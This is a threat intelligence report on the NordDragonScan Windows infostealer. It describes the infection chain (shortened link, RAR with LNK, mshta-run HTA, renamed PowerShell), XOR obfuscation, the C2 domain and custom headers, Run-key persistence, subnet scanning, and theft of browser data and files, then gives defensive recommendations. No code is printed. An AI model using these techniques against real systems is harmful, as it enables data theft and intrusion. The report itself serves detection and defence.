Security researchers have recently discovered a new information-stealing software named "NordDragonScan," which conducts stealthy attacks on Windows computers using "living-off-the-land" (LOTL) techniques.

• Affected Platforms: Microsoft Windows

• Affected Users: Microsoft Windows

• Impact: Stolen information may be used for future attacks

• Severity Level: High

Initial Vector

The attacker exploits a shortened link service with the URL “hxxps://cutt[.]ly/4rnmskDe” redirecting to “hxxps://secfileshare[.]com,” which triggers the download of a RAR file named “Укрспецзв_Акт_30_05_25_ДР25_2313_13 від 26_02_2025.rar” (Ukrspetszv_Act_30_05_25_DR25_2313_13 dated 26_02_2025). This file contains a malicious LNK shortcut that silently calls mshta.exe to execute the HTA payload 1.hta from the same server.

Figure 1. LNK File

Next, the malicious HTA file copies a legitimate PowerShell.exe file to the path “C:\Users\Public\Documents\install.exe” to disguise itself. It then downloads an encrypted TXT file, decrypts it, and saves the result as Act300525.doc. This decoy document, titled “Акт здачі-приймання наданих Послуг до договору про надання послуг” (Service Acceptance Act under the Service Agreement), is harmless and intended to distract the user. Finally, the HTA script silently downloads and executes a malicious payload, embedded as an executable file named adblocker.exe, into the victim's directory “\AppData\Local\Temp\adblocker.exe”

Figure 2. HTA File "1.hta"

Figure 3. Decoy Document from "1.hta"

The attacker's server maintains multiple fake files designed to entice user interaction. These decoy files use a similar HTA script mechanism, helping to download and execute the same payload, adblocker.exe, on compromised systems. The reuse of the same executable file across different decoy documents indicates a strategy by the attacker to maximize infection opportunities while using diverse document themes and file names to evade detection and security monitoring.

Analysis of the Malicious Payload

The malicious payload downloaded from the previous phase is a .NET executable file containing an embedded PDB path: “C:\Users\NordDragon\Documents\visual studio”

NordDragonScan employs string obfuscation techniques, performing XOR operations and byte swapping to hide the code from static analysis. It then checks whether a dedicated working directory “NordDragonScan” exists in the “%LOCALAPPDATA%” directory. If this directory does not exist, it creates a new one to temporarily store stolen data before uploading it to the C2 server.

Figure 4. Checking the Directory

Next, the malware connects to the C2 server, “kpuszkiev.com,” with specific HTTP headers, notably “User-Agent: RTYUghjNM,” along with the victim's MAC address. During the initial connection, the main goal is to obtain a dynamic URL from the C2, which is then used as an endpoint to extract stolen data.

Figure 5. Obtaining the URL for Data Extraction

It then establishes persistence by adding a “NordStar” registry entry to “Software\Microsoft\Windows\CurrentVersion\Run”

Figure 6. Adding Registry for Auto-Launch on Startup

Information Gathering Phase

After connecting, NordDragonScan moves to the information-gathering phase on the local machine. It collects basic victim information, including computer name, username, operating system version, architecture, processor count, driver information, and RAM using a combination of WMI and .NET commands. The attacker then lists all active network adapters, extracts the primary IPv4 address and subnet mask, and calculates the CIDR range. The malware then begins a slow scan of each address within the same subnet, creating a catalog of accessible hosts on the same LAN.

Figure 7. Gathering Network Information

Figure 8. Network Scanning

It also captures a screenshot and saves it as “SPicture.png” and collects data from Chrome and Firefox browsers on the victim's machine.

Figure 9 Copying Chrome Data into “Chrm”

Figure 10. Copying Firefox Data

NordDragonScan continues to scan the local file system, including Desktop, Documents, and Downloads folders, and copies files in these directories with the following extensions: “.docx,” “.doc,” “.xls,” “.ovpn,” “.rdp,” “.txt,” and “.pdf.” Once a matching file is found, it copies it into the working directory and groups them by file origin. When the scanning phase is complete, it makes a POST request to the C2 server. This request uses a custom header “User-Agent: Upload,” or “Backups:,” and the name of the data it is preparing to send, such as “sysinfo.txt” for system information.

Figure 11. Stolen Data in the Working Directory

Figure 12. POST Request Sent by Malware to C2 Server

List of IOCs Related to NordDragonScan Malware

Domain

Hash

Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent information-stealing software (infostealer) like NordDragonScan and similar variants:

• Enhance Email and Download Control: Implement strict email filtering policies to prevent downloading suspicious compressed files (.rar, .zip) or dangerous HTA scripts (.hta).

• Monitor System Execution Behavior: Continuously monitor system processes that may be abused, such as mshta.exe, PowerShell.exe, rundll32.exe, and suspicious behaviors like remote file decryption, creating executables in temporary folders, setting registry entries for persistence, or communicating with Command & Control (C2) servers.

• Protect Browser Data and Sensitive Information: Avoid saving automatic login information in Chrome or Firefox browsers.

• Configure File and System Access Policies Appropriately: Apply restricted write and execute permissions in directories commonly exploited by malware, such as %LOCALAPPDATA%, %TEMP%. Enhance monitoring of sensitive file formats like .docx, .pdf, .xls, .ovpn, .rdp to prevent data leakage.

• Conduct Security Awareness Training for End Users: Equip users with knowledge to identify fake shortcut files, document spoofing techniques, and habits to thoroughly check file origins before opening. Emphasize the importance of not installing software from shortened links or untrusted sharing sites.

• Establish Intrusion Detection and Monitoring Systems: Monitor outbound network traffic to detect unusual data transmission to C2 servers, uncommon HTTP headers, or behaviors related to beaconing/heartbeat to unknown domains.

References

• NordDragonScan: Quiet Data-Harvester on Windows